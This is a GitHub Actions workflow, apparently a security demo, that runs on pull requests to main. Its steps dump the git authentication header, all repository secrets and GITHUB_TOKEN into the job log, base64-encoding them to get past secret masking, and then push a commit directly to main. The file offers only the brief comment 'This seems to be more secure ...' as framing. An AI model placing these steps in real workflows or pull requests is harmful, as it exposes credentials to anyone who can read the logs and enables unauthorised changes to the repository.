name: Pull request testing

on:
  #push:   
    #branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  event-testing:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

# This seems to be more secure ... 
      - name: trigger
        run: |
          echo "Triggered ..."
          echo ------------
          git config --get http.https://github.com/.extraheader | base64

      - name: trigger2
        env:
          DEMO: ${{ toJSON(secrets) }}
        run: |  
          echo $DEMO | base64 | base64

      - name: trigger3
        run: |  
          echo ${{ secrets.GITHUB_TOKEN }}
          
      - name: Commit changes
        run: |
          git config --global user.name 'xxradar'
          git config --global user.email 'xxradar@radarhack'
          echo demo >demo.txt
          git add demo.txt
          git commit -m "Adding demo.txt"
          git push origin HEAD:main
